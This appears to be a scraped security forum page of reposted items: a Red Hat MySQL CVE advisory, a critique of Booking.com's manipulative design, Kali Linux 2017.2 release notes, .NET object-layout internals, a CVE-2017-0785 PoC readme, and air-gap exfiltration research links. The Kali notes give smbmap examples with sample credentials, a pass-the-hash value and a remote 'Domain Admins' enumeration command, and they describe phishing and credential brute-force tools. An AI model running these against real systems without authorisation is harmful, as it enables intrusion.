CVE-2017-3463, CVE-2017-3464, CVE-2017-3633, CVE-2017-3634, CVE-2017-3636, CVE-2017-3641, CVE-2017-3647, CVE-2017-3648, CVE-2017-3649, CVE-2017-3651, CVE-2017-3652, CVE-2017-3653) Red Hat would like to thank Pali Rohár for reporting CVE-2017-3305. Bug Fix(es): * Previously, the md5() function was blocked by MySQL in FIPS mode because the MD5 hash algorithm is considered insecure. Consequently, the mysqld daemon failed with error messages when FIPS mode was enabled. With this update, md5() is allowed in FIPS mode for non-security operations. Note that users are able to use md5() for security purposes but such usage is not supported by Red Hat. (BZ#1452469) 4. Solution: For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 After installing this update, the MySQL server daemon (mysqld) will be restarted automatically. 5. Bugs fixed (https://bugzilla.redhat.com/): 1414133 - CVE-2017-3312 mysql: insecure error log file handling in mysqld_safe, incomplete CVE-2016-6664 fix (CPU Jan 2017) 1414337 - CVE-2016-8327 mysql: Server: Replication unspecified vulnerability (CPU Jan 2017) 1414338 - CVE-2017-3238 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2017) 1414342 - CVE-2017-3244 mysql: Server: DML unspecified vulnerability (CPU Jan 2017) 1414350 - CVE-2017-3257 mysql: Server: InnoDB unspecified vulnerability (CPU Jan 2017) 1414351 - CVE-2017-3258 mysql: Server: DDL unspecified vulnerability (CPU Jan 2017) 1414352 - CVE-2017-3273 mysql: Server: DDL unspecified vulnerability (CPU Jan 2017) 1414353 - CVE-2017-3313 mysql: Server: MyISAM unspecified vulnerability (CPU Jan 2017) 1414355 - CVE-2017-3317 mysql: Logging unspecified vulnerability (CPU Jan 2017) 1414357 - CVE-2017-3318 mysql: Server: Error Handling unspecified vulnerability (CPU Jan 2017) 1414423 - CVE-2017-3265 mysql: unsafe chmod/chown use in init script (CPU Jan 2017) 1414429 - CVE-2017-3291 mysql: unrestricted mysqld_safe's ledir (CPU Jan 2017) 1422119 - CVE-2017-3302 mysql: prepared statement handle use-after-free after disconnect 1431690 - CVE-2017-3305 mysql: incorrect enforcement of ssl-mode=REQUIRED in MySQL 5.5 and 5.6 1433010 - CVE-2016-5483 CVE-2017-3600 mariadb, mysql: Incorrect input validation allowing code execution via mysqldump 1443358 - CVE-2017-3308 mysql: Server: DML unspecified vulnerability (CPU Apr 2017) 1443359 - CVE-2017-3309 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2017) 1443363 - CVE-2017-3450 mysql: Server: Memcached unspecified vulnerability (CPU Apr 2017) 1443364 - CVE-2017-3452 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2017) 1443365 - CVE-2017-3453 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2017) 1443369 - CVE-2017-3456 mysql: Server: DML unspecified vulnerability (CPU Apr 2017) 1443376 - CVE-2017-3461 mysql: Server: Security: Privileges unspecified vulnerability (CPU Apr 2017) 1443377 - CVE-2017-3462 mysql: Server: Security: Privileges unspecified vulnerability (CPU Apr 2017) 1443378 - CVE-2017-3463 mysql: Server: Security: Privileges unspecified vulnerability (CPU Apr 2017) 1443379 - CVE-2017-3464 mysql: Server: DDL unspecified vulnerability (CPU Apr 2017) 1443386 - CVE-2017-3599 mysql: integer underflow in get_56_lenc_string() leading to DoS (CPU Apr 2017) 1472683 - CVE-2017-3633 mysql: Server: Memcached unspecified vulnerability (CPU Jul 2017) 1472684 - CVE-2017-3634 mysql: Server: DML unspecified vulnerability (CPU Jul 2017) 1472686 - CVE-2017-3636 mysql: Client programs unspecified vulnerability (CPU Jul 2017) 1472693 - CVE-2017-3641 mysql: Server: DML unspecified vulnerability (CPU Jul 2017) 1472703 - CVE-2017-3647 mysql: Server: Replication unspecified vulnerability (CPU Jul 2017) 1472704 - CVE-2017-3648 mysql: Server: Charsets unspecified vulnerability (CPU Jul 2017) 1472705 - CVE-2017-3649 mysql: Server: Replication unspecified vulnerability (CPU Jul 2017) 1472708 - CVE-2017-3651 mysql: Client mysqldump unspecified vulnerability (CPU Jul 2017) 1472710 - CVE-2017-3652 mysql: Server: DDL unspecified vulnerability (CPU Jul 2017) 1472711 - CVE-2017-3653 mysql: Server: DDL unspecified vulnerability (CPU Jul 2017) 1477575 - service start fails due to wrong selinux type of logfile 1482122 - Test case failure: /CoreOS/mysql/Regression/bz1149143-mysql-general-log-doesn-t-work-with-FIFO-file Sursa: https://mailinglist-archive.mojah.be/redhat-announce/2017-09/msg00048.php
  19. How Booking.com manipulates you Published on September 17, 2017; tags: Misc Many websites and applications these days are designed to trick you into doing things that their creators want. Here are some examples from timewellspent.io: YouTube autoplays more videos to keep us from leaving. Instagram shows new likes one at a time, to keep us checking for more. Facebook wants to show whatever keeps us scrolling. Snapchat turns conversations into streaks we don’t want to lose. Our media turns events into breaking news to keep us watching. But one of the most manipulative websites I’ve ever come across is Booking.com, the large hotel search & booking service. If you ever used Booking.com, you probably noticed (and hopefully resisted!) some ways it nudges you to book whatever property you are looking at: Let’s see what’s going on here. Prices First, it tries to persuade you that the price is low. “Jackpot! This is the cheapest price you’ve seen in London for your dates!” Of course it is — this is literally the first price I am seeing for these days — so that statement is tautological. The first price I see will automatically be the lowest I will have seen, no matter how ridiculously high it’s going to be. The statement “This is the highest price you’ve seen in London for your dates!” would be just as valid. Likewise, the struck-through prices are there to anchor you and make the actual price seem like a great deal. The struck-through US$175 is before applying my 10% “genius” discount — ok, that’s fair. But where does the US$189 come from? Let’s hover over the price to get an explanation: I imagine most people will feel intimidated by the complex description, skip to the last sentence, and get the impression that “you get the same room for a lower price compared to other check-in dates”. (If this wasn’t the case, Booking.com’s marketing department would change the wording to make it so.) But what is it actually saying? If there is only one room of this type, then 90% of time there will be an appearance of a lucky deal. What you should be reading is “If I choose this, I am not a total loser”. And if there are 3 comparable room types with differential pricing, there is even less of a reason to feel good about this — you’ve successfully avoided the worst 3% of the offerings. Urgency Another way Booking.com manipulates you is by conveying the sense of urgency. “In high demand - only 3 rooms left on our site!” “33 other people looking now, according to our Booking.com travel scientists” (what?) “Last chance! Only 1 room left on our site!” And just to prove they are not kidding, they will show you something that you’ve missed already: But my favorite one is this red badge: Although it cannot be seen on the screenshot, the badge doesn’t appear right away when you open the page. Instead, it pops up one or two seconds later, making it seem like a realtime notification — an impression reinforced by the alarm clock icon. To be clear, it is not realtime, and there is no reason to delay its display other than to trick you: How much time has elapsed since the last booking doesn’t simply play on our irrational emotions. This is a valuable piece of information that can be used to estimate at what rate these rooms are being booked. By a Gott-like argument (see Algorithms to Live By for an excellent explanation), if the last booking was made 4 hours ago, you can estimate that a room is booked about every 8 hours. Plenty of time to relax and compare your options. If, on the other hand, the last booking happened just two seconds ago, you’d better not waste another second before entering your credit card number. Kudos to Booking for at least providing the actual information in a tooltip window (I wonder what regulations make them do that), but not all users will hover to read it, and even then, something that you experience (a badge popping up) will probably take precedence over what you later read. The “Someone just booked this” badge does not just make you worry that the room you are considering will soon be snatched; it also reassures you. If other people are actively booking this property, it must be good. Of course, the person who made a reservation 4 hours ago has not yet visited the hotel and so probably has little more knowledge than you. Their decision to book is probably to some extent influenced by the same red badge. This situation, where everyone relies on everyone else to have accurate information, is also well described in Algorithms to Live By. Reviews Instead of listening to people who have just booked the property but have not yet visited it, we should turn to those who have been there, right? That’s what reviews are for! But Booking.com managed to game the reviews, too. There are quite a few crappy hotels out there, especially on the cheaper end of the spectrum. These are the hotels you and I would want to avoid, but if we did, Booking would not make money on them. An extreme example is the hotel I’m currently staying at, New Union. From its Booking.com page you wouldn’t think there’s anything wrong with it, would you? If you spend enough time perusing that page, you’ll eventually stumble upon the “fine print”: “noise may be heard whilst the bar is open” is an understatement; the music is so loud that the floor in my room shakes very perceptibly, and the bar is open until late at night/early in the morning. And why is this warning hidden in the fine print instead of being a big red fucking badge? To be fair, this is more of the hotel’s fault than Booking’s. Also, I should have read the fine print. Or the reviews. But wait, I’ve read the reviews: What I didn’t realize skimming an overloaded webpage was that the reviews displayed on the main page had been cherry-picked. The full list of reviews is available from a separate page, e.g. Ratings Notice something interesting here: the first, moderately negative review, gives the place a rating of 7 out of 10, and the second review, probably as negative as it gets, gives it almost a 6. As a result, the overall rating of the property is high (7.6), and even the distribution of ratings does not look alarming: Unlike IMDB or Amazon, where you simply give a movie or product a number of stars, when you rate your stay on Booking.com, you evaluate it on several factors: location, cleanliness, facilities etc. But Booking.com doesn’t present individual ratings; it presents the average (like 7.1 or 5.8), and the average of averages (the overall rating of a property). It is unlikely that all factors will be bad simultaneously, but a problem in one of them may easily ruin your trip. A great location will not compensate for dirty sheets, but Booking.com thinks otherwise. What to do with all of this Frankly, I don’t think I am going to stop using Booking.com. I am not aware of any other service with a comparable number of properties and reviews. Instead, we need to be aware of all the ways Booking is trying to screw us over and try to counter them: Ignore urgency-provoking red text and anchoring struck-through prices. Do not rely on the magnitude of the ratings. I think it is still fine to use them as a sorting criterion. Do not read the cherry-picked reviews on the main page. Go to the review page (“Our guests’ experiences”) and sort the reviews from newest to oldest, to get an up-to-date and hopefully unbiased selection. Sursa: https://ro-che.info/articles/2017-09-17-booking-com-manipulation
  20. Kali Linux 2017.2 Release September 20, 2017 dookie We are happy to announce the release of Kali Linux 2017.2, available now for your downloading pleasure. This release is a roll-up of all updates and fixes since our 2017.1 release in April. In tangible terms, if you were to install Kali from your 2017.1 ISO, after logging in to the desktop and running ‘apt update && apt full-upgrade’, you would be faced with something similiar to this daunting message: 1399 upgraded, 171 newly installed, 16 to remove and 0 not upgraded. Need to get 1,477 MB of archives. After this operation, 1,231 MB of additional disk space will be used. Do you want to continue? [Y/n] That would make for a whole lot of downloading, unpacking, and configuring of packages. Naturally, these numbers don’t tell the entire tale so read on to see what’s new in this release. New and Updated Packages in Kali 2017.2 In addition to all of the standard security and package updates that come to us via Debian Testing, we have also added more than a dozen new tools to the repositories, a few of which are listed below. There are some really nice additions so we encourage you to ‘apt install’ the ones that pique your interest and check them out. hurl – a useful little hexadecimal and URL encoder/decoder phishery – phishery lets you inject SSL-enabled basic auth phishing URLs into a .docx Word document ssh-audit – an SSH server auditor that checks for encryption types, banners, compression, and more apt2 – an Automated Penetration Testing Toolkit that runs its own scans or imports results from various scanners, and takes action on them bloodhound – uses graph theory to reveal the hidden or unintended relationships within Active Directory crackmapexec – a post-exploitation tool to help automate the assessment of large Active Directory networks dbeaver – powerful GUI database manager that supports the most popular databases, including MySQL, PostgreSQL, Oracle, SQLite, and many more brutespray – automatically attempts default credentials on discovered services On top of all the new packages, this release also includes numerous package updates, including jd-gui, dnsenum, edb-debugger, wpscan, watobo, burpsuite, and many others. To check out the full list of updates and additions, refer to the Kali changelog on our bug tracker. Ongoing Integration Improvements Beyond the new and updated packages in this release, we have also been working towards improving the overall integration of packages in Kali Linux. One area in particular is in program usage examples. Many program authors assume that their application will only be run in a certain manner or from a certain location. For example, the SMBmap application has a binary name of ‘smbmap’ but if you were to look at the usage example, you would see this: Examples: $ python smbmap.py -u jsmith -p password1 -d workgroup -H 192.168.0.1 $ python smbmap.py -u jsmith -p 'aad3b435b51404eeaad3b435b51404ee:da76f2c4c96028b7a6111aef4a50a94d' -H 172.16.0.20 $ python smbmap.py -u 'apadmin' -p 'asdf1234!' -d ACME -h 10.1.3.30 -x 'net group "Domain Admins" /domain' If you were a novice user, you might see these examples, try to run them verbatim, find that they don’t work, assume the tool doesn’t work, and move on. That would be a shame because smbmap is an excellent program so we have been working on fixing these usage discrepancies to help improve the overall fit and finish of the distribution. If you run ‘smbmap’ in Kali 2017.2, you will now see this output instead: Examples: $ smbmap -u jsmith -p password1 -d workgroup -H 192.168.0.1 $ smbmap -u jsmith -p 'aad3b435b51404eeaad3b435b51404ee:da76f2c4c96028b7a6111aef4a50a94d' -H 172.16.0.20 $ smbmap -u 'apadmin' -p 'asdf1234!' -d ACME -h 10.1.3.30 -x 'net group "Domain Admins" /domain' We hope that small tweaks like these will help reduce confusion to both veterans and newcomers and it’s something we will continue working towards as time goes on. Learn More About Kali Linux In the time since the release of 2017.1, we also released our first book, Kali Linux Revealed, in both physical and onlineformats. If you are interested in going far beyond the basics, really want to learn how Kali Linux works, and how you can leverage its many advanced features, we encourage you to check it out. Once you have mastered the material, you will have the foundation required to pursue the Kali Linux Certified Professional certification. Kali ISO Downloads, Virtual Machines and ARM Images The Kali Rolling 2017.2 release can be downloaded via our official Kali Download page. This release, we have also updated our Kali Virtual Images and Kali ARM Images downloads. As always, if you already have Kali installed and running to your liking, all you need to do in order to get up-to-date is run the following: apt update apt dist-upgrade reboot We hope you enjoy this fine release as much as we enjoyed making it! Sursa: https://www.kali.org/news/kali-linux-2017-2-release/
  21. Managed object internals, Part 1. The layout Sergey TeplyakovMay 26, 2017 The layout of a managed object is pretty simple: a managed object contains instance data, a pointer to a meta-data (a.k.a. method table pointer) and a bag of internal information also known as an object header. The first time I’ve read about it, I’ve got a question: why the layout of an object is so weird? Why a managed reference points into the middle of an object and an object header is at a negative offset? What information is stored in the object header? When I started thinking about the layout and did a quick research, I’ve got few options: 1. JVM used a similar layout for their managed objects from the inception. It could sound a bit crazy today but remember that C# has one of the worst features of all times (a.k.a. array covariance) just because Java had it back in the day. And compared to that decision, reusing some ideas about the structure of an object doesn’t sound that unreasonable. 2. Object header can grow in size with no cross-cutting changes in the CLR. Object header holds some auxiliary information used by CLR and it is possible that CLR will require more information than a pointer size field. And indeed, .Net Compact Framework used in mobile phones has different headers for small and large objects (see WP7: CLR Managed Object overhead for more details). Desktop CLR never used this ability but it doesn’t mean that it is impossible in the future. 3. Cache line and other performance related characteristics. Chris Brumme -- one of the CLR architects, mentioned in the comment on his post “Value Types“ that cache friendliness is the very reason for the managed object layout. It is theoretically possible that due to cache line size (64 bytes) it will be more efficient to access fields that are closer to each other. This means that dereferencing method table pointer with the following access to some field should have some performance difference depending on the location of the field inside the object. I’ve spent some time trying to proof that this is still true for modern processors but was unable to get any benchmarks that showed the difference. After spending some time trying to validate my theories, I’ve contacted Vance Morrison asking this very question and got the following answer: current design was made with no particular perf considerations. So, the answer to the question – “Why the managed object’s layout is so weird?”, is simple: “historical reasons”. And, to be honest, I can see a logic for moving object header at a negative index to emphasize that this piece of data is an implementation detail of the CLR, the size of it can change in time, and it should not be inspected by a user. Now, it’s time to inspect the layout in more details. But before that, let’s think about, what extra information CLR can be associated with a managed object instance? Here are some ideas: · Special flags that GC can use to mark that an object is reachable from application roots. · Special flag that notifies GC that an object is pinned and should not be moved during garbage collection. · Hash code of a managed object (when a GetHashCode method is not overridden). · Critical section and other information used by a lock statement: thread that acquired the lock etc. Apart from instance state, CLR stores a lot of information associated with a type, like method table, interface maps, instance size and so on, but this is not relevant for our current discussion. IsMarked flag Managed object header is a multi-purpose chameleon that can be used for many different purposes. And you may think that the garbage collector (GC) uses a bit from the object header to mark that the object is references by a root and should be kept alive. This is a common misconception, and few very famous books are to blame (*). Namely “CLR via C#” by Jeffrey Richter, “Pro .NET Performance” by Sasha Goldstein at al and, definitely, some others. Instead of using the object header, the CLR authors decided to use one clever trick: the lowest bit of a method table pointer is used to store a flag during garbage collection that the object is reachable and should not be collected. Here is an actual implementation of ‘mark’ flag from the coreclr repo, file gc.cpp, lines 8974 (**): (**) Unfortunately, the gc.cpp file is so big that github refuses to analyze it. This means that I can’t add a hyperlink to a specific line of code. Managed pointers in a CLR heap are aligned on 4-byte or 8-byte address boundaries depending on a platform. This means that 2 or 3 bits of every pointer are always 0 and can be used for other purposes. The same trick is used by JVM and called ‘Compressed Oops’ – the feature that allows JVM to have 32 gigs heap size and still use 4 bytes for managed pointer. Technically speaking, even on a 32-bit platform there is 2 bits that can be used for flags. Based on a comment from the object.h file we can think that this is indeed the case and the second lowest bit of the method table pointer is used for pinning (to mark that the object should not be moved during compaction phase of garbage collection). Unfortunately, it is not clear, is true or not, because SetPinned/IsPinned methods from the gc.cpp (lines 3850-3859) are implemented based on a reserved bit from the object header and I was unable to find any code in the coreclr repo that actually sets the bit of the method table pointer. Next time we’ll discuss how locks are implemented and will check how expensive they are. Part 1: https://blogs.msdn.microsoft.com/seteplia/2017/05/26/managed-object-internals-part-1-layout/ Part 2: https://blogs.msdn.microsoft.com/seteplia/2017/09/06/managed-object-internals-part-2-object-header-layout-and-the-cost-of-locking/ Part 3: https://blogs.msdn.microsoft.com/seteplia/2017/09/12/managed-object-internals-part-3-the-layout-of-a-managed-array-3/ Part 4: https://blogs.msdn.microsoft.com/seteplia/2017/09/21/managed-object-internals-part-4-fields-layout/
      • 1
      • Upvote
  22. CVE-2017-0785 PoC This is just a personal study based on the Android information leak vulnerability released by Armis. Further reading: https://www.armis.com/blueborne/ To run, be sure to have pybluez and pwntools installed. sudo apt-get install bluetooth libbluetooth-dev sudo pip install pybluez sudo pip install pwntools Sursa: https://github.com/ojasookert/CVE-2017-0785
      • 1
      • Upvote
  23. Abstract— The continuous discovery of exploitable vulnerabilities in popular applications (e.g., document viewers), along with their heightening protections against control flow hijacking, has opened the door to an often neglected attack strategy— namely, data-only attacks. In this paper, we demonstrate the practicality of the threat posed by data-only attacks that harness the power of memory disclosure vulnerabilities. To do so, we introduce memory cartography, a technique that simplifies the construction of data-only attacks in a reliable manner. Specifically, we show how an adversary can use a provided memory mapping primitive to navigate through process memory at runtime, and safely reach security-critical data that can then be modified at will. We demonstrate this capability by using our cross-platform memory cartography framework implementation to construct data-only exploits against Internet Explorer and Chrome. The outcome of these exploits ranges from simple HTTP cookie leakage, to the alteration of the same origin policy for targeted domains, which enables the cross-origin execution of arbitrary script code. The ease with which we can undermine the security of modern browsers stems from the fact that although isolation policies (such as the same origin policy) are enforced at the script level, these policies are not well reflected in the underlying sandbox process models used for compartmentalization. This gap exists because the complex demands of today’s web functionality make the goal of enforcing the same origin policy through process isolation a difficult one to realize in practice, especially when backward compatibility is a priority (e.g., for support of cross-origin IFRAMEs). While fixing the underlying problems likely requires a major refactoring of the security architecture of modern browsers (in the long term), we explore several defenses, including global variable randomization, that can limit the power of the attacks presented herein. Download: https://www3.cs.stonybrook.edu/~mikepo/papers/xfu.eurosp17.pdf
  24. osx-config-check Checks your OSX machine against various hardened configuration settings. You can specify your own preferred configuration baseline by supplying your own Hjson file instead of the provided one. Disclaimer The authors of this tool are not responsible if running it breaks stuff; disabling features of your operating system and applications may disrupt normal functionality. Once applied, the security configurations do not not guarantee security. You will still need to make good decisions in order to stay secure. The configurations will generally not help you if your computer has been previously compromised. Configurations come from sites like: drduh's OS X Security and Privacy Guide Usage You should download and run this application once for each OS X user account you have on your machine. Each user may be configured differently, and so each should be audited. Download this app using Git, GitHub Desktop, or the "download as zip" option offered by GitHub. If you choose the zip option, unarchive the zip file after. In the Terminal application, navigate to the directory that contains this app. You can use the cd command (see example below) to change directories. If you've downloaded the file to your "Downloads" directory, you might find the app here: cd ~/Downloads/osx-config-check If that directory doesn't exist because the folder you retrieved is named slightly different (such as 'osx-config-check-master' or 'osx-config-check-1.0.0'), you can always type in a portion of the directory name and hit the [TAB] key in Terminal to auto-complete the rest. Next run the app as follows: python app.py This will take you through a series of interactive steps that checks your machine's configuration, and offers to fix misconfigurations for you. Intermediate users and advanced users can also invoke various command-line arguments: Usage: python app.py [OPTIONS] OPTIONS: --debug-print Enables verbose output for debugging the tool. --report-only Only reports on compliance and does not offer to fix broken configurations. --disable-logs Refrain from creating a log file with the results. --disable-prompt Refrain from prompting user before applying fixes. --skip-sudo-checks Do not perform checks that require sudo privileges. --help -h Print this usage information. Sursa: https://github.com/kristovatlas/osx-config-check
  25. Air-Gap Research Page By Dr. Mordechai Guri Cyber-Security Research Center Ben-Gurion University of the Negev, Israel email: gurim@post.bgu.ac.il (linkedin) aIR-Jumper (Optical) "aIR-Jumper: Covert Air-Gap Exfiltration/Infiltration via Security Cameras & Infrared (IR)" Mordechai Guri, Dima Bykhovsky‏, Yuval Elovici Paper: http://arxiv.org/abs/1709.05742 Video (infiltration): https://www.youtube.com/watch?v=auoYKSzdOj4 Video (exfiltration): https://www.youtube.com/watch?v=om5fNqKjj2M xLED (Optical) Mordechai Guri, Boris Zadov, Andrey Daidakulov, Yuval Elovici. "xLED: Covert Data Exfiltration from Air-Gapped Networks via Router LEDs" Paper: https://arxiv.org/abs/1706.01140 Or: http://cyber.bgu.ac.il/advanced-cyber/system/files/xLED-Router-Guri_0.pdf Demo video: https://www.youtube.com/watch?v=mSNt4h7EDKo AirHopper (Electromagnetic) Mordechai Guri, Gabi Kedma, Assaf Kachlon, and Yuval Elovici. "AirHopper: Bridging the air-gap between isolated networks and mobile phones using radio frequencies." In Malicious and Unwanted Software: The Americas (MALWARE), 2014 9th International Conference on, pp. 58-67. IEEE, 2014. Guri, Mordechai, Matan Monitz, and Yuval Elovici. "Bridging the Air Gap between Isolated Networks and Mobile Phones in a Practical Cyber-Attack." ACM Transactions on Intelligent Systems and Technology (TIST) 8, no. 4 (2017): 50. Demo video: https://www.youtube.com/watch?v=2OzTWiGl1rM&t=20s BitWhisper (Thermal) Mordechai Guri, Matan Monitz, Yisroel Mirski, and Yuval Elovici. "Bitwhisper: Covert signaling channel between air-gapped computers using thermal manipulations." In Computer Security Foundations Symposium (CSF), 2015 IEEE 28th, pp. 276-289. IEEE, 2015. Demo video: https://www.youtube.com/watch?v=EWRk51oB-1Y&t=15s GSMem (Electromagnetic) Mordechai Guri, Assaf Kachlon, Ofer Hasson, Gabi Kedma, Yisroel Mirsky, and Yuval Elovici. "GSMem: Data exfiltration from air-gapped computers over gsm frequencies." In 24th USENIX Security Symposium (USENIX Security 15), pp. 849-864. 2015. Demo video: https://www.youtube.com/watch?v=RChj7Mg3rC4 Fansmitter (Acoustic) Mordechai Guri, Yosef Solewicz, Andrey Daidakulov, and Yuval Elovici. "Fansmitter: Acoustic Data Exfiltration from (Speakerless) Air-Gapped Computers." arXiv preprint arXiv:1606.05915 (2016). Demo video: https://www.youtube.com/watch?v=v2_sZIfZkDQ DiskFiltration (Acoustic) Mordechai Guri,Yosef Solewicz, Andrey Daidakulov, Yuval Elovici. "Acoustic Data Exfiltration from Speakerless Air-Gapped Computers via Covert Hard-Drive Noise (‘DiskFiltration’)". European Symposium on Research in Computer Security (ESORICS 2017) pp 98-115 Mordechai Guri, Yosef Solewicz, Andrey Daidakulov, and Yuval Elovici. "DiskFiltration: Data Exfiltration from Speakerless Air-Gapped Computers via Covert Hard Drive Noise." arXiv preprint arXiv:1608.03431 (2016). Demo video: https://www.youtube.com/watch?v=H7lQXmSLiP8 USBee (Electromagnetic) Mordechai Guri, Matan Monitz, and Yuval Elovici. "USBee: Air-Gap Covert-Channel via Electromagnetic Emission from USB." arXiv preprint arXiv:1608.08397 (2016). Demo video: https://www.youtube.com/watch?v=E28V1t-k8Hk LED-it-GO (Optical) Mordechai Guri, Boris Zadov, Yuval Elovici. "LED-it-GO: Leaking (A Lot of) Data from Air-Gapped Computers via the (Small) Hard Drive LED". Detection of Intrusions and Malware, and Vulnerability Assessment - 14th International Conference, DIMVA 2017: 161-184 Mordechai Guri, Boris Zadov, Eran Atias, and Yuval Elovici. "LED-it-GO: Leaking (a lot of) Data from Air-Gapped Computers via the (small) Hard Drive LED." arXiv preprint arXiv:1702.06715 (2017). Demo video: https://www.youtube.com/watch?v=4vIu8ld68fc VisiSploit (Optical) Mordechai Guri, Ofer Hasson, Gabi Kedma, and Yuval Elovici. "An optical covert-channel to leak data through an air-gap." In Privacy, Security and Trust (PST), 2016 14th Annual Conference on, pp. 642-649. IEEE, 2016. Mordechai Guri, Ofer Hasson, Gabi Kedma, and Yuval Elovici. "VisiSploit: An Optical Covert-Channel to Leak Data through an Air-Gap." arXiv preprint arXiv:1607.03946 (2016). Attachment: PDF icon xLED-Router-Guri.pdf Link: http://cyber.bgu.ac.il/advanced-cyber/airgap
×
×
  • Create New...